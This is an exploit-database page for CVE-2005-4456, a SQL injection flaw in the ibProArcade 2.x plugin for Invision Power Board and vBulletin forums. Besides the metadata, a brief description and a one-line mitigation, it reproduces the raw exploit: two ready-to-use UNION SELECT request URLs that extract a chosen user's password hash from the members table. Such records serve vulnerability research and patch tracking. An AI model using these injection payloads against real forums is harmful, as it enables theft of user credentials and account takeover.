header-logo
Suggest Exploit
vendor:
ibProArcade
by:
B~HFH
9.3
CVSS
HIGH
SQL Injection
89
CWE
Product Name: ibProArcade
Affected Version From: 2.x
Affected Version To: 2.x
Patch Exists: YES
Related CWE: CVE-2005-4456
CPE: a:invision_power_services:ibproarcade
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2005

Rankings for (name) will state the md5 hash for the user /str0ke

This vulnerability allows an attacker to inject arbitrary SQL code into the ibProArcade and vBulletin forums. By exploiting this vulnerability, an attacker can gain access to the database and extract sensitive information such as usernames and passwords.

Mitigation:

To mitigate this vulnerability, users should ensure that all input is properly sanitized and validated before being used in a SQL query.
Source

Exploit-DB raw data:

# Rankings for (name) will state the md5 hash for the user /str0ke
# ibProArcade 2.x

IPB:
index.php?act=Arcade&module=report&user=-1 union select password from ibf_members where id=[any_user]

vBulettin forums:
index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]

Author: B~HFH
Email:  bhfh01@gmail.com

# milw0rm.com [2005-11-06]

Navigation

Suggest Exploit

Services By CQR